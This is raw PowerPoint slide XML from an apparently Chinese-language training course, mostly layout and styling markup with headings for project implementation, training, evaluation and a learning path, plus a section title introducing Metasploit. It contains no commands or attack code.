                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实施</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="84" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13895" y="6880"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目训练</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="86" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16233" y="2830"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="87" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="88" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="89" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId6"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="90" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId7"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="91" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId8"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="92" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Text Placeholder 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16635" y="6800"/>
              <a:ext cx="1600" cy="484"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buNone/>
                <a:defRPr sz="2000" b="1" baseline="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="457200" indent="0">
                <a:buNone/>
                <a:defRPr sz="1200"/>
              </a:lvl2pPr>
              <a:lvl3pPr marL="914400" indent="0">
                <a:buNone/>
                <a:defRPr sz="1000"/>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1371600" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl4pPr>
              <a:lvl5pPr marL="1828800" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl5pPr>
              <a:lvl6pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl6pPr>
              <a:lvl7pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl7pPr>
              <a:lvl8pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl8pPr>
              <a:lvl9pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>项目评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4505325" y="1420495"/>
            <a:ext cx="2266950" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>学习路径</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.1 认识Metasploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
